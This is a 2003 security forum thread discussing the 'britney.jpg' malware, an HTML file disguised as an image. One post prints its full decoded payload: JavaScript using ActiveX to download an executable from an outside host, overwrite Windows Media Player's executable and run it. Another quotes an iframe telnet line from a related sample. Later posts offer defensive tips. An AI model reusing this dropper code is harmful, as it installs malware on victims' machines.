-
October 28th, 2003, 01:31 AM
#11
Yes, that's right, it just "hid" in the .jpg. I am inclined to agree that we are looking at a disguised executable here ( and our friend Gore certainly thinks that britney is executable )
I was a bit worried when I saw the .jpg description on its own!
Cheers
-
October 28th, 2003, 11:56 AM
#12
Banned
Like the mokkel.jpg file this file is also an html file (according to bash)
Code:
knoppix@ttyp1[knoppix]$ file britney.jpg
britney.jpg: HTML document text
Attached is the text.
-
October 28th, 2003, 01:13 PM
#13
* Kils "reset message" button *
EDIT: Removed the URL encoded text because your browser evaluates is any way
URL Decoded (Same as some one pasted earlier)
var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://scavenger.sharewith.us/patch.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); location.href = "mms://";
I don't have time to fully decompile it, but it looks pretty clever.
- Noia
With all the subtlety of an artillery barrage / Follow blindly, for the true path is sketchy at best. .: Bring OS X to x86!:.
Og ingen kan minnast dei linne drag i dronningas andlet den fagre dag Då landet her kvilte i heilag fred og alle hadde kjærleik å elske med.
-
November 4th, 2003, 11:38 AM
#14
Well from what is being said, pretty soon me thinks that the internet will not be a safe place to wander around..
It's like a mine field, one wrong click of that mouse and BOOOOOOOM..
You got a Virus, Worm or you've had your system crashed..
Anyhow when ever i'm in Irc i don't click none of those cheesey links, no matter how big the temptation would be..
Because it will either be just another lame Porn site, or to something that doesn't interest me..
But by the way it looks i'm glad that i didn't click that link now..
I was so fruitin close to clickin it just to calm my curiosity..
Anyhow
Cheers
-
November 4th, 2003, 10:05 PM
#15
Senior Member
Originally posted here by creative_32X_mx
Well from what is being said, pretty soon me thinks that the internet will not be a safe place to wander around..
It's like a mine field, one wrong click of that mouse and BOOOOOOOM..
You got a Virus, Worm or you've had your system crashed..
Anyhow when ever i'm in Irc i don't click none of those cheesey links, no matter how big the temptation would be..
Because it will either be just another lame Porn site, or to something that doesn't interest me..
But by the way it looks i'm glad that i didn't click that link now..
I was so fruitin close to clickin it just to calm my curiosity..
Anyhow
Cheers
If you're referring to the britney virus, then it was smart not clicking. As they say "curiousity killed the cat".
-
November 5th, 2003, 04:19 AM
#16
Originally posted here by Viper2026
If you're referring to the britney virus, then it was smart not clicking. As they say "curiousity killed the cat".
Well unless your a pussy you wont have much to worry about then right? Just use a *NIx box that you dont have hooked up online and you can prolly take this virii apart and see whats inside it.
-
November 5th, 2003, 04:43 AM
#17
Besides the obvious (NOT clicking unknow links), what can an average user do to prevent this kind of infection?
I know that by email, if you disable the win option 'hide file extensions for know file types', you get to see the entire thing ur about to download, but in this case what can we do?
Is disabling ActiveX downloads enough?
We shouldn't need to be suspitious about everything virii makers suck !
-
November 5th, 2003, 04:46 AM
#18
I just modified that mokkel file so that it only does one telnet session so now if I want to telnet to a certain site i just go to that page. I was wondering what does the chr(34) do in this line:
document.write("<iframe src=" + chr(34) + "telnet://sdf.lonestar.org:23" + chr(34) + ">")
I thought maybe it had something to do with the lenght of the string but that doesn't seem to be the case. And is there a way to prompt for input so I can change the entry of the site to anything I want. Just trying to make use of something bad.
-
November 5th, 2003, 05:39 AM
#19
Senior Member
Originally posted here by h3r3tic
I just modified that mokkel file so that it only does one telnet session so now if I want to telnet to a certain site i just go to that page. I was wondering what does the chr(34) do in this line:
document.write("<iframe src=" + chr(34) + "telnet://sdf.lonestar.org:23" + chr(34) + ">")
I thought maybe it had something to do with the lenght of the string but that doesn't seem to be the case. And is there a way to prompt for input so I can change the entry of the site to anything I want. Just trying to make use of something bad.
Well I know that there is a javascript iframe explot with ie, that I don't think has been officially patched, so it looks as if that is calling telnet, and then it probably tells it to repeat somewhere else in the code (I haven't looked at it myself)
-
November 5th, 2003, 05:46 AM
#20
Originally posted here by Sm0kinP0t
Besides the obvious (NOT clicking unknow links), what can an average user do to prevent this kind of infection?
Not open attachments called "****MyPC.exe" Not open ANY attachments they arent expecting. When they get an attachment, ask the person if they really sent it to them to be sure. Install update and run anti virii, install update and run a firewall, delete Windows, use Linux or any other OS on earth, take a computer basics class, read a computer book and LEARN.
I know that by email, if you disable the win option 'hide file extensions for know file types', you get to see the entire thing ur about to download, but in this case what can we do?
Not use outlook or any other Windows email client honestly. That stupid preview **** really gets ya.
Is disabling ActiveX downloads enough?
Prolly not
We shouldn't need to be suspitious about everything virii makers suck !
If it wasnt for virus writers, norton would never make a penny, there anti virii is there main product. Iv had virii before, well a few times from opening them myself knowing what they were. Virus writers are NOT the problem, OS writers ARE. Iv met a few virii writers who do not release there viruses for infection, but more or less turn it into an art form, and also for playing jokes. The original virii created on computers were on UNIX boxes and did basically one thing, play pranks.
Thats all they usually are still. If your server gets taken down by this prank, then learn to update your software or not use Windows, which is what they write virii for. Why do they do that? Well, almost everyone uses Windows, so why go for anything else? Besides it's fun when bill gates blushes
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|